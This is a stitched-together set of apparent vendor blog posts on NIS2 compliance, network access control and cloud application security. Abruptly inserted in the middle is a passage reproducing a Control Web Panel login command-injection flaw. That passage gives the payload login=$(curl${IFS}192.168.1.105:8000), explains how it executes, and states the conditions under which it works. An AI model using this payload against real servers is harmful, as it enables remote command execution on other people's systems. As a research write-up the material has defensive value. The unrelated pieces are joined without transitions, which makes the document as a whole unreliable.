On November 10, 2022 (published on 27 December 2022), the EU Parliament adopted new legislation (the NIS2 Directive) to strengthen EU-wide cybersecurity resilience which includes, among other requirements, a crystal-clear requirement for backup and disaster recovery.
The Network and Information Security Directive (NIS2) is a response to the increased exposure of Europe to cyberthreats and the fact that the more interconnected we are, the more we are vulnerable to malicious cyber activity. The regulators hereby set consistent rules for companies and ensure that law enforcement and judicial authorities can work effectively and raise the awareness of EU citizens on cybersecurity.
Keepit supports the EU initiative on protecting our digital infrastructure, our sensitive business data, as well as our personal data.
What Is the Purpose of the NIS Directive?
In comparison to the first NIS directive, the purpose of the NIS2 Directive is to expand the requirements and sanctioning of cybersecurity to harmonize and streamline the level of security across member states—and with tougher requirements for several sectors.
The European Parliamentary Research Service (EPRS), in a briefing on the NIS2 Directive, tells that due to the fact that cyberattacks are quickly growing in number worldwide, as well as increasing in scale, cost and sophistication, “the Commission has submitted this proposal to replace the original NIS Directive and thereby strengthen the security requirements, address the security of supply chains, streamline reporting obligations, and introduce more stringent supervisory measures and stricter enforcement requirements.”
So what has lead to the need for more requirements? According to the WEF Global Risks Report 2023, it is because:
The ever-increasing intertwining of technologies with the critical functioning of societies is exposing populations to direct domestic threats, including those that seek to shatter societal functioning.
Who Does NIS2 Apply To? Which Sectors and entities?
The directive applies particularly to two categories, with those two being “essential” entities and “important” entities.
The following are classified as essential sectors:
Energy (electricity, district heating, oil, gas, and hydrogen)
Transport (air, rail, water, and road)
Banking (credit institutions)
Financial market infrastructures (marketplaces)
The health sector (healthcare providers and manufacturers of pharmaceuticals, etc.)
Drinking and wastewater
Digital infrastructure (including providers of cloud services, data centers, domain name systems (DNS), top-level domain registries (TLD) and public communication networks)
Information and communication service providers (ICT services)
Providers of managed services and managed security services
Public administration
Space
The ‘important entities’ includes public and private entities within:
Postal and courier services
Waste management
Manufacture, production, and distribution of chemicals
Manufacture, processing, and distribution of food
Production of i.a., electronics, machinery, and motor vehicles
Providers of certain digital services (online marketplaces and search engines and social networking services)
Research (higher education institutions and research institutions).
If you are an entity that provides a service that is essential for the maintenance of critical societal and/or economic activities—for example, a transport company—you are, in the eyes of the law, classified as an “operator of essential services.”
This classification will entail a lot of pressure on your technical and organizational structure and capabilities due to the extensive risk management security you are required by law to implement and maintain.
NIS2 Requirements, Risk Management, and Security Measures
The current NIS Directive requires the covered entities to take appropriate and proportionate technical and organizational measures to manage security risks and limit the damage in the event of a security incident.
The NIS2 Directive continues this requirement and sets out additional requirements for appropriate security measures, which must now include as a minimum:
Policies for risk analysis and information security
Incident handling
Business continuity, such as backup management and disaster recovery and crisis management
Supply chain security, including supplier management/security
Security in connection with the acquisition, development, and maintenance of network and information systems
Policies and procedures for assessing the effectiveness of measures to manage cyber security risks
Guidelines for basic ‘computer hygiene’ and cyber security training
Policies for Use of Cryptography and Encryption
Employee security, access control, and asset management
Securing internal communication systems.
Negotiating and Navigating the NIS2 Directive
A dedicated backup and data management solution can help your organization implement resilient data protection and management services for your SaaS workloads, such as Microsoft 365 and Salesforce.
Keepit offers a suite of services for your SaaS data which can help you comply with the legal requirements of the NIS2 Directive with the overall goal of protecting your business continuity.
However, you need to decide which functions are essential and determine how ready you are to maintain those critical functions after an emergency or a disruption—and finally allocate the available budget accordingly. Read our article: Data Compliance Makes Third-Party Security a Must.
Governance
With the NIS2 Directive, the governance provisions are tightened as the responsibility for violation of the NIS2 Directive is not only imposed on the legal entity but on the management itself.
Thus, management must approve the risk management measures taken by the entity regarding cybersecurity and oversee implementation and maintenance. What’s key to a backup strategy? Read our blog post on the 3-2-1 backup rule here.
To ensure sufficient competencies, management members must regularly follow specific courses to obtain the necessary knowledge, insight, and skills to understand and assess cybersecurity risks and management practices and their impact on the entity’s operations.
Supervision, Enforcement, and Sanctions
According to the NIS2 Directive, the competent national authorities must oversee compliance with the directive’s security and notification requirements based on specific incidents—and the competent authorities are empowered to issue certain orders.
What Are the Costs of Non-compliance?
The competent authority can, among other things, issue warnings and orders and (particularly materially) temporarily suspend or request that a person with management responsibility (CEO or another senior member of management) be temporarily suspended from exercising management functions in the entity.
The NIS2 Directive also tightens the sanction options. In addition to having to ensure that violations are punished with sanctions that are effective, proportionate to the violation, and have a dissuasive effect, the competent authority in the Member States now has the concrete possibility to impose administrative fines if the entity does not comply with the directive’s requirements for risk management measures or reporting obligations.
The administrative fines are as follow:
Essential entities – as a minimum – can be fined up to a maximum of 10 million EUR or 2% of the company’s total global annual revenue.
Important entities – as a minimum – can be fined up to a maximum of 7 million EUR or 1.4% of the company’s total global annual revenue.
When Does It Begin? Timeline and Important Dates
The EU member states will now have 20 months to transpose the new directive into national law. Want to know more about the important dates and the timeline surrounding NIS2 entering into force? Go to https://www.nis-2-directive.com/ to learn more about the important dates.
What Are the Next Steps? Educate with Further Reading
We recommend starting to educate yourself and your organization on the legal requirements and to start mapping for compliance gaps with the requirement for risk management and risk measures. You can read the EU Parliament briefing of the legislation here.
For those wanting an in-depth look into the matter, the European Parliament has shared the full texts adopted regarding this proposal, which can be read in PDF format here.
Beyond the NIS2 Directive, Keepit delivers a solid return on investment beyond the critical compliance requirements. Check out our post entitled “What’s the Return on Investment (ROI) of a cloud backup solution” here.
About Version 2 Digital
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About Keepit At Keepit, we believe in a digital future where all software is delivered as a service. Keepit’s mission is to protect data in the cloud Keepit is a software company specializing in Cloud-to-Cloud data backup and recovery. Deriving from +20 year experience in building best-in-class data protection and hosting services, Keepit is pioneering the way to secure and protect cloud data at scale.
The username and password are the root user and the password of the root.
The vulnerability
The vulnerability existed in “login” parameter in the login page
Capture the login request
Now, let’s make a simple test by trying to curl website
Run http simple server python3 -m http.server
replace “login=logout” with login=$(curl${IFS}192.168.1.105:8000)
and here is the request:
While I’m reproducing this vulnerability I noticed something with the authentication.
This is supposed to be “unauthenticated RCE”, but I found out that you still need to know the correct username.
Here are some test cases:
Send the payload with the incorrect username & incorrect password ❌
Send the payload with the incorrect username & correct password ❌
Send the payload with the correct username & incorrect password ✅
Before we go to how to get a reverse shell, let’s explain the payload
Let’s take this payload as an example:
$(curl${IFS}192.168.1.105:8000)
The IFS variable is being used here in a way that it’s being used as a separator between
the curl command and the URL, which is “192.168.1.105:8000”.
The $() operator is used to execute the command inside the parentheses and returns the output. This means that the command is making a request to the specified IP address and port number using, and the output of the request will be returned and can be used in the following commands or assigned to a variable.
The source code is encoded with ionCube, it’s easy to decode it or reverse engineer it, and it’s illegal.
We only have one line script here which checks if the IonCube Loader extension is loaded and if not, it attempts to load it dynamically.
Since we don’t have the source code I wanted to get more insight into what the code would look like.
So I started to run more analysis trying to understand the code in the back-end so I can simulate it:
I know that any command execution results getting stored in the logs
The login errors getting recorded in/var/log/cwp_client_login.log
now cat cwp_client_login.log
While I’m doing this I noticed the following:
As we mentioned before, the user should be correct and we are assuming that we don’t know the password.Since this is failed login, the website will redirect the user to log in again.
in this case, the command will not execute ❌
in case we are using Brupsuite, once we send the request the command gets executed ✅
Since the results of the executed commands getting recorded in the log files, I want to analyze the logs.
2023-01-25 20:44:27 root Failed Login from: 192.168.1.107 on: 'https://localhost:2031/login/index.php?login=root'
The “2023–01–25 20:44:27” date and time get changed every time, so this is a variable.
The “root” is the user
“Failed Login from:” This is a message and it’s the same every time
The “192.168.1.107” is the IP of the user who is trying to log in
There is a check, if the user is not correct the execution doesn’t work.
When the login error happens the URL with the parameter getting recorded in cwp_client_login.log
The date changes, the user (I’m not sure about it, but it should be a variable as well), the failed login statement, and the user IP.
This brings us to a very interesting conclusion, only IF there is a login error where the user is correct, the URL along with the parameter will be stored in the log file.
we can understand that there is something wrong that happened when the whole URL gets passed and not enough sanitization.
After more reading about this specific CVE, I found that the URL is getting passed to some execution function and that’s how the false attempts are logged
The mentioned technique in the blogs are as follows:
echo "incorrect_enter, IP address, HTTP_request_URI" >> ./wring_entry.log
After I made some tests, I found that unless we passed the payload in this specific way such as:
$(command)
` command `
it won’t execute, so that means there is something else. more searching, and asking questions. I was looking for functions in PHP I may use to sanitize a parameter against command injection. because if they are passing anything to execute a command they are supposed to sanitize the passed parameters first.
I found those two:
escapeshellarg(): This function is used to escape a string to be used as a command-line argument in a shell command. It adds single quotes around the string and escapes any existing single quotes within the string, ensuring that the string is treated as a single argument and is protected against injection attacks.
escapeshellcmd(): This function is used to escape a string that is used as a shell command. It escapes any characters that may be used to inject additional commands into the shell command.
This is a very simple and easy vulnerability to exploit and that is what makes it more dangerous, however, it’s always interesting and fun to dive deep into the source code and understand the root cause of the vulnerability.
In our case since the code is encoded and it’s illegal to decode it, I tried to give more insight into how this vulnerability might be happening in the backend therefore I needed to conduct a lot more analysis and tests, also go through tons of researching and asking questions.
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About VRX VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.
Ensuring a high level of visibility into network access remains a key requirement for efficient NAC management. When network administrators are in the dark about who is accessing the network or what devices are in use, enforcing robust security controls becomes a monumental challenge. To overcome this, the adoption of a sophisticated NAC solution is advisable. These systems provide the much-needed advantage of real-time monitoring and comprehensive reporting, thereby offering invaluable insights into users and devices on the network. Armed with this information, administrators can proactively identify and neutralize potential threats to network security, creating a stronger, more resilient infrastructure.
Further enhancement to visibility can be achieved through the integration of machine learning and artificial intelligence technologies. These advanced tools can automate the process of monitoring network traffic, identifying patterns, and flagging unusual behavior that may indicate a potential security risk.
Not to be overlooked is the importance of having clear, well-defined security policies. Such guidelines help ensure all network users and devices are appropriately accounted for and have the necessary permissions for network access. Regular reviews and updates of these policies are crucial to maintaining a robust and relevant network access control framework.
In addition, conducting regular network access audits is a highly effective strategy. These audits not only identify potential vulnerabilities but also provide an opportunity for administrators to evaluate and improve their current NAC strategies.
In summary, tackling visibility concerns in network access requires a multifaceted approach that involves the use of advanced NAC solutions, integration of AI and machine learning technologies, effective security policies, and regular network audits. With these measures in place, network administrators can rest assured that they have a clear and comprehensive understanding of their network access landscape, significantly enhancing their ability to safeguard against potential security threats.
Managing Unauthorized Access
Controlling unauthorized network access is paramount in maintaining a secure environment. Unwanted external intruders or even internal personnel can become significant threats if they gain access without appropriate permissions. One effective method of counteracting this challenge is the execution of stringent access control policies. These policies can dictate what level of access each user has, limiting their ability to interact with sensitive areas of the network.
Technologies such as two-factor authentication (2FA) and biometric identification can be powerful tools in this context. Implementing 2FA adds an extra layer of security by requiring users to provide two distinct forms of identification before granting access. Biometric identification, on the other hand, leverages unique physical or behavioral characteristics of individuals to authenticate their identity. This could range from fingerprint scanning to facial recognition, making it significantly harder for unauthorized users to gain network access.
In addition to the above, smart cards can offer a physical token-based approach to authenticate and verify users. The advantage of smart cards lies in their capability to store and process data securely, thus providing an added layer of protection.
To further fortify network security, regular network access audits should be performed. Such audits serve the dual purpose of identifying weak spots where unauthorized access may occur and confirming that all current access control measures are functioning effectively. By routinely scrutinizing the network access landscape, potential vulnerabilities can be spotted and rectified promptly, thus preventing them from being exploited by unauthorized users.
Adopting and Integrating Cloud-native Security Products
The progressive migration of businesses towards cloud platforms calls for a comprehensive strategy to incorporate cloud-native security products. This endeavor, while promising in terms of enhanced flexibility and scalability, can present its own set of network access control challenges.
To successfully integrate cloud-native security products, the initial focus should be on the compatibility of these tools with your cloud platform. Network administrators need to select security solutions that align seamlessly with the specific cloud services in use, thereby ensuring a smoother transition and optimal performance.
One critical aspect is the support for similar protocols and standards between your cloud service provider and the security product. A failure in this synchronization can lead to unnecessary complexities and vulnerabilities in your security posture. Thus, it’s crucial to validate this compatibility ahead of time to prevent such issues.
Also noteworthy is the ability of these security tools to provide a unified and cohesive security stance. An ideal security product should not operate in isolation but should provide an integrated view of security across all the deployed cloud services. This integration reduces the burden of managing disparate systems, saving time, and reducing the complexity for network administrators.
In addition, organizations need to ensure that these security tools are capable of addressing their unique needs and specific threat landscapes. This could include features like data encryption, intrusion detection, compliance monitoring, or vulnerability scanning, among others. The suitability of these features should be evaluated based on the organization’s risk profile and regulatory requirements.
Lastly, consider the scalability and adaptability of the chosen cloud-native security product. As your organization grows and your cloud environment expands, your security solution should be able to scale accordingly. This adaptability prevents future investments in new tools to meet increased security needs.
Budget Constraints for Investing in New Security Technology
Financial limitations can often impede the procurement of advanced security technologies, posing unique budget-related network access control challenges for network administrators. The issue becomes more profound when the rising cybersecurity threats necessitate continuous updates to the security arsenal. However, there are strategic ways to overcome this obstacle.
To begin, organizations should prioritize their investments by analyzing their specific risk profiles and business needs. Deploying a risk-based approach to security investments ensures resources are allocated to areas that carry the highest risk or impact. Therefore, instead of spreading a limited budget thinly across numerous tools, this approach allows organizations to invest effectively in a few, essential security measures.
Leveraging open-source security solutions can provide a cost-efficient route to improved network security. While it may not offer the exact features of premium tools, these solutions can provide a basic level of protection against common network threats. Additionally, the open-source community often provides ongoing updates, ensuring the software remains effective against evolving threats. However, it’s crucial to assess the quality and reliability of open-source solutions before integrating them into your network.
A Security-as-a-Service (SECaaS) model can be a viable alternative for organizations with limited budgets. Rather than investing in individual security products, SECaaS provides an array of comprehensive security services on a subscription basis. This model not only enables organizations to access top-tier security solutions but also reduces the cost and complexity associated with their management and maintenance.
Furthermore, organizations can consider cooperative purchasing arrangements, where multiple organizations join to negotiate better pricing with vendors, or leasing arrangements, which can spread the cost over time and improve cash flow management.
The final consideration is investing in employee training. An educated workforce can act as a powerful line of defense, reducing the likelihood of expensive security breaches caused by human error. Though often overlooked, this is a cost-effective approach to improving network security without the need for significant investment in technology.
Managing Network Access Control from Multiple Locations
As organizations increasingly adopt distributed and remote work models, new network access control challenges involving managing diverse geographical locations has arisen. Maintaining the integrity and security of the network while providing adequate access to remote employees requires a nuanced and robust approach.
To tackle this challenge effectively, the implementation of centralized network management systems is crucial. These systems empower network administrators to control and monitor network access from any location, ensuring seamless operations despite geographical boundaries. With such systems, administrators can enforce uniform security policies, detect potential threats, and respond swiftly to security incidents across all network access points.
Furthermore, deploying Virtual Private Networks (VPNs) is an effective strategy for remote network access control. VPNs offer secure encrypted tunnels for data transmission between the user and the network, thereby protecting the data from interception. For added security, administrators can combine VPN usage with Multi-factor Authentication (MFA), which requires users to verify their identities through multiple methods before granting network access.
The advent of Software Defined Perimeter (SDP) technology can also prove beneficial in managing NAC from multiple locations. SDP solutions, also known as Zero Trust Network Access (ZTNA), create individualized perimeters for each user, granting them access only to the specific resources they need. This approach minimizes the attack surface and reduces the risk of internal threats.
However, as the network extends beyond the traditional boundaries, the need for advanced security tools becomes paramount. Solutions such as Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) can help monitor and protect the network from potential threats, regardless of the user’s location.
Finally, regularly conducting network access audits can aid in identifying potential weak spots and inconsistencies in access control. These audits can reveal any discrepancies in the application of security policies across locations, providing valuable insights for enhancing the overall NAC strategy.
By embracing these solutions and strategies, organizations can successfully manage network access control from multiple locations, thereby ensuring business continuity and robust security in a distributed work environment.
Dealing with Insider Threats and Rogue Network Access Points
In the ever-evolving landscape of network security, managing insider threats and rogue network access points can pose a significant challenge. Both these elements can stealthily create vulnerabilities within the system, making detection and mitigation a demanding task. However, effective strategies can help network administrators navigate this complex issue.
In this regard, Behavior Analysis Tools (BATs) can be instrumental. These solutions scrutinize network activity to identify anomalies that deviate from established user behavior patterns. This continuous monitoring can flag unexpected or suspicious actions, providing early warning signs of potential insider threats. However, the key to leveraging BATs is defining what constitutes “normal” behavior, which requires an in-depth understanding of user roles and activities within the network.
Likewise, the implementation of Intrusion Detection Systems (IDS) can help identify unauthorized access points within the network. These systems work by monitoring network traffic for suspicious activities or violations of network policies. When an intrusion is detected, the IDS alerts the network administrator, who can then take necessary actions to neutralize the threat. To enhance the effectiveness of IDS, it should be paired with an Intrusion Prevention System (IPS), which not only detects but also prevents network intrusions.
Enforcing strict access control policies is another crucial strategy. These policies should clearly outline who has access to what data and when, creating boundaries that can prevent unauthorized access and data leakage. For these policies to be effective, they need to be comprehensive, updated regularly, and communicated effectively to all network users.
Providing regular security training for employees is also essential. Many insider threats are unintentional, often resulting from a lack of understanding of security best practices. By educating employees about the importance of network security and the potential consequences of their actions, organizations can significantly reduce the likelihood of insider threats.
Finally, a comprehensive audit of network access can reveal potential weak spots, such as rogue access points, and provide insights into the effectiveness of current security measures. Regular audits, coupled with the continuous monitoring provided by BATs and IDS, create a robust defense against insider threats and rogue network access points.
By adopting these strategies, network administrators can significantly enhance their ability to manage and mitigate potential insider threats and rogue access points, fortifying their network against these often overlooked but critical security challenges.
About Version 2 Digital
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About Portnox Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。
In the modern economy, around 75% of workloads have migrated to the cloud. Millions of workers use the cloud daily to send messages, develop code, and manage customer relationships. Cloud computing is convenient, flexible, and cost-effective. But relying on the cloud brings security risks.
Unsecured apps are vulnerable to external attacks, data loss, and infrastructure damage. One unprotected app can cause an enterprise-wide data breach. Fortunately, there are many ways to strengthen cloud security and make application usage safe.
This blog will explore cloud app security and the threats users face. You should find everything you need to know when securing critical cloud assets.
What Is cloud application security?
Cloud application security is a set of tools, policies, and procedures that protect information passing across a cloud environment. The aim is to:
Create a secure environment and protect data on all cloud apps
Manage cyber threats
Prevent unauthorized access to cloud resources
Ensure the availability of critical assets
Cloud application security covers popular platforms like Amazon AWS, Google, and Microsoft Azure. It also extends to individual SaaS apps hosted on cloud platforms. Collaboration tools like Slack or Zoom require specific security solutions. The same applies to cloud-hosted business tools like Salesforce or data storage services.
Do you need cloud application security?
Yes. Legacy network security tools cannot properly protect cloud assets. VPNs and firewalls can protect locally-hosted data and applications. But cloud apps are hosted by third parties. Users can access them from virtually anywhere via a huge range of devices.
Attack surfaces have become more complex as cloud apps have proliferated. Cloud endpoints cannot be secured by locally-managed hardware or encrypted network connections. Older tech plays a role, but new application security approaches are essential.
Cloud application security threats
The first step in securing a cloud environment is understanding critical security threats. Here are some of the most important cloud application security risks to factor into security planning.
Misconfigured cloud apps – Gartner reports that as many as 99% of cloud security issues are due to client error. Cloud deployments are complex, and teams must manage a range of application configurations. Every SaaS app requires access controls and processes to guard against shadow IT. Getting app configurations right is essential.
Account hijacking – Malicious attackers can hijack user accounts and infiltrate cloud-hosted apps. Account hijacking tends to result from poor password hygiene and credential exposure. Security teams must enforce strong password policies. Password managers make life easier for workers. Encryption keeps credentials private and secure.
Phishing – Phishers persuade employees to provide access credentials. They may also entice users to click links that harvest private data. Security teams must train all staff and enforce responsible behavior.
Automated attacks – Attackers may find vulnerabilities via scanning agents. Botnets target poorly secured cloud apps, taking down cloud resources via denial-of-service attacks.
Buggy APIs – APIs connect cloud applications and users. They need to be secure at all times. The problem with APIs is that they are both feature and data-rich. One compromised feature could expose data inside the app for outsiders to harvest.
Physical security – Cloud applications rest on physical hardware somewhere in the world. Cloud providers must protect hardware against theft and take measures to handle fire, extreme weather, and other sources of damage.
Inadvertent data loss – Staff can accidentally delete data, change it irreversibly, or lose encryption keys. This places intact data out of reach. A comprehensive data backup strategy is essential.
Cloud application security best practices
Failure to deal with cloud security vulnerabilities can have serious consequences. Let’s explore some app security best practices to lock down critical assets.
1. Understand the threat surface
Robust cloud application security rests upon strong visibility. Total awareness of cloud workloads and device connections puts you in a good position to apply controls.
Create and maintain inventories of connected cloud apps. This inventory will form the basis for security measures later on. Trim the inventory regularly to remove any unneeded cloud apps. Try to keep the threat surface as small as possible.
2. Deploy identity and access management (IAM)
Every cloud application is vulnerable to credential theft. Enterprises must establish complete control over who accesses cloud apps. They must also define and manage user privileges.
Cloud-native IAM tools manage access by authenticating log-in requests. They compare login credentials with secure directories and ensure that only authentic users gain access. Multi-Factor Authentication (MFA) adds another set of time-limited and unique credentials.
After admitting users, IAM systems authorize their privileges. Privileges allow users to carry out core workloads and restrict access to other applications.
Developers can access the tools they need. Sales teams can access CRM databases and marketing assets. Every role is limited, but workers are free to carry out their duties.
Additionally, IAM applies Single Sign On. SSO creates a single point of entry to cloud resources. One cloud-based application provides access to all apps. There is no need to secure multiple cloud endpoints.
More advanced IAM tools actively check for unsafe credential storage. They alert security teams if staff store credentials digitally or share information insecurely. All these features enhance the safety of cloud applications.
3. Create a cloud application security strategy
Companies need cloud application security. This strategy should specify how to access cloud apps safely and how user identities are verified. Users should know what they need to do and what threat mitigation controls are in place.
Looking beyond security policies, security teams should have a clear plan to secure data on all cloud applications. This can be visualized on three levels to cover vulnerabilities:
Platforms. Cloud infrastructure underlying can include exposed data files. If companies develop cloud infrastructure in-house, security staff must focus on correctly configuring platforms. Encrypting all data is advisable.
Databases. Secure cloud databases with appropriate encryption and access controls. Assess the right authorization levels for every role. Workers should only have access to relevant data. All other information should be out of reach.
Applications. Secure the attack surface by extending IAM to all applications. Check API configurations, and use any threat detection systems provided by app developers. Set up automated notifications about unusual access requests or network traffic patterns.
4. Use automated security testing
Testing is a critical aspect of cloud app security. It may be too late to detect and mitigate vulnerabilities when cloud apps go live. Instead, companies should switch from standard DevOps to DevSecOps (Development Security Operations).
DevSecOps includes automated testing systems that assess code during the development phase. Testing during the CI/CD process uncovers weaknesses before hackers have a chance to exploit them.
Testing should extend to open-source code libraries used to build cloud applications. It should also cover data containers and user-provisioned cloud deployments. Every part of the cloud environment is vulnerable.
Testing does not end after app provisioning. Enterprises must continuously test IAM systems to ensure the integrity of IAM processes. They should also test encryption tools. Keys may be exposed or out of date, creating inherent weaknesses.
Automation is vital. You can automate development and post-deployment testing to reduce security workloads and ensure regular results.
5. Focus on password hygiene
Companies need to drive home the importance of password hygiene. Access controls and encryption mean little if employees expose passwords to outsiders.
Stolen or hacked credentials are a major security weakness. Staff must use strong passwords and change them regularly.
SSO helps make this task more manageable as workers handle fewer credentials. Cloud-native password managers also automate password strengthening and password replacement.
6. Employ comprehensive encryption strategies
Exposed data is an easy target for hackers inside cloud perimeters. That’s why encryption is a critical component of cloud app security.
Encryption scrambles data, making it unreadable to anyone without specific encryption keys. There are three main ways to encrypt data on the cloud:
Encrypting data at rest secures information stored by enterprises. This could include HR information or financial records. Companies can encrypt files, databases, and even cloud platforms. With more layers covered, hackers will struggle to access confidential data.
Encrypting data in transit makes collaboration safer. Data constantly moves throughout cloud environments. Information passes from on-premises networks and remote devices to the cloud. Encrypting data as it moves protects against interception attacks.
Encrypting data in use makes using applications safer. Employees may retain workloads in an open state for long periods. This leaves data vulnerable to interception and extraction. The use of encryption and tools like DRM makes in-use data less accessible.
7. Active threat detection
Monitor cloud applications in real-time to detect threats and protect data. User behavior patterns can provide clues about ongoing attacks. Access requests for sensitive files can generate automated alerts.
Security teams can use activity monitoring data to fine-tune privileges management. Monitoring data is also a valuable compliance tool, providing evidence of continuous security management.
8. Regularly patch software and apply system updates
Cloud applications require timely and frequent updates to keep pace with evolving threats. Codebase changes and new services constantly present new vulnerabilities and exploits for hackers to target. Automated scheduled updates neutralize weak spots as they emerge.
9. Proactive privacy and compliance policies
Data privacy is a central part of compliance strategies. Enterprises operating in the cloud face major regulatory challenges, including GDPR, PCI-DSS, or HIPAA compliance. Secure cloud apps to meet relevant compliance standards.
Security teams should build app security audits into their schedule. Check that apps and security controls meet regulatory guidelines. Include the development environment used to provision cloud applications and open-source libraries used by DevOps teams.
Use regulatory requirements as a framework to build effective controls. For instance, PCI-DSS compliance demands data encryption for financial records. HIPAA demands tight identity management and encryption of sensitive information.
Compliance strategies aren’t static. Enterprises should take a proactive approach when securing sensitive data, using regulatory frameworks as guides.
How businesses could secure their cloud applications
Legacy tools like VPNs have security limitations when guarding the cloud. Instead, using security tools that function alongside cloud application APIs is advisable.
IAM and SSO systems are essential components of cloud security strategies alongside data encryption and threat monitoring. Fortunately, you can source solutions that bring together core app security functions.
The two major options here are proxy or API-integrated Cloud Access Security Brokers (CASBs):
Proxy CASBs route traffic through a separate proxy between user devices and cloud apps. Proxies usually employ HTTP and can intervene with traffic passing through cloud endpoints. The CASB applies encryption and tracks anomalies such as suspicious login requests.
API-based CASBs do not require an extra layer of routing. These CASBs are built into cloud apps instead. This has many potential benefits, as well as some drawbacks.
Benefits of API-based CASBs include:
Improved speed – There is no need to route traffic via a proxy. This boosts speeds and improves the user experience. Routing large amounts of traffic through a proxy may lead to performance issues as demands grow.
Firewall interaction – API CASBs supplement existing network firewalls. They add cloud security features that protect data and monitor activity. Proxy CASBs damage performance by adding another security barrier alongside firewalls.
Easy upgrades – Users must update CASBs as applications evolve. App developers often add or exchange protocols and authentication systems. But developers do not routinely alert CASB developers about needed upgrades. API-based tools are easier to patch as apps change. Over time, cloud apps will leave proxy CASBs behind.
Better security – Proxy-based CASBs break TLS sessions to access the HTTP stream. They then reconstruct TLS protection to complete cloud access. Users trust their CASB to restore TLS sessions safely and reliably. This weak point can compromise the security of cloud deployments.
Major cloud computing providers like Google and Amazon recommend API-embedded CASBs where possible. This makes perfect sense in a fast-changing cloud application environment.
However, API-based CASBs may not work with all SaaS deployments. CASBs are often compatible with most but not all APIs. This can add complexity to cloud security architecture. Proxy CASBs can operate across different APIs, resulting in simple solutions.
Enterprises also need to be aware of problems surrounding CASBs. For instance, cloud infrastructure providers rarely inform CASB developers about platform alterations that cause security issues. Cloud platforms can change quickly. CASB vendors need to keep up with changes and plug any security holes.
This issue affects proxy CASBs more than API-based versions. API-based brokers integrate closely with apps. App developers tend to flag any API changes for CASB developers. As a result, patches appear in a more timely manner. Users can expect stronger security.
The shared security responsibility model
Before implementing cloud application security best practices, bring the shared responsibility model into the picture.
In cloud environments, cloud providers and users share responsibility for security. Responsibility levels depend upon your cloud computing setup and your choice of a cloud service provider.
Generally speaking, cloud providers like AWS or Microsoft Azure assume responsibility for protecting:
The infrastructure stack (including hosts and data centers)
Software required to host cloud applications and data
Networking infrastructure connecting cloud apps
Clients must handle everything else. Responsibilities vary according to whether you choose IaaaS, PaaS, or SaaS deployments.
IaaS – Infrastructure-as-a-service users have the widest responsibilities. Users must protect apps and data, as well as infrastructure. This includes middleware and can include the cloud operating system.
PaaS – Platform-as-a-service users must protect any infrastructure they maintain, including apps and data hosted by their service provider. Any proprietary apps hosted by third parties remain your responsibility.
SaaS – Software-as-a-service users are responsible for data stored or processed by cloud applications. The main security risks relating to SaaS applications are access management and encrypting sensitive data.
Shared responsibility model in practice
Getting the balance right when applying the shared responsibility model is all-important. A good starting point is assessing every cloud application.
It is critical to define the responsibilities of users and providers for each application. Be clear about internal security controls and what your provider offers. Write a clear description of who is responsible for securing each asset and how to ensure data security.
Regardless of the cloud model in use, users are always responsible for:
Securing on-premises and remote access endpoints
Protecting data flowing through cloud resources
Managing access to cloud applications.
Bring operations and security teams together. Developers need to provision cloud services flexibly and quickly. Security teams must advise about how to calibrate those services safely.
However, cloud users aren’t alone. Cloud service providers realize the complexity involved in managing cloud application security threats.
Providers usually offer user controls within APIs to secure their apps. They may also offer monitoring and threat management functions. Always investigate and use available cloud-native security tools.
Enterprises can also request audit information from providers. This should include details about their security strategy. Compare the material provided with your service terms to ensure providers meet their obligations.
Cloud application security assessment checklist
Before we finish, here is a quick checklist of critical cloud application security measures:
1. Create robust security policies covering all cloud apps. Take into account private, public and multi-cloud environments. Consider how to secure remote workers. Include processes to onboard and off-board employees. And put plans in place to detect and mitigate data breaches.
2. Implement IAM for the cloud. Ensure users have the correct privileges. Keep in mind Zero Trust concepts and the principle of least privilege. Combine cloud apps with SSO and add an extra protective screen with MFA.
3. Train staff in cloud security awareness. Make sure staff is aware of data storage and password policies. Train workers in secure cloud application usage and ways to share data safely. Focus on the threat posed by phishing attacks.
4. Deploy cloud security controls. Protect endpoints with encryption and CASBs. For instance, cloud-specific controls like disabling SSH and SQL Server access guard against brute force attacks.
5. Check application configurations. Poorly configured cloud apps are a critical security threat. Enforce API protection policies to configure apps properly. Focus on potential malware injection sites to neutralize common external attacks.
6. Put backups in place. Store sensitive data and workloads on separate cloud servers. Backup server files to ensure smooth disaster recovery. Carry out regular restoration tests to make sure data is recoverable.
7. Update software when needed. Use automated patch management to update cloud applications and deliver patches to all worker devices. Test updates when possible before deployment.
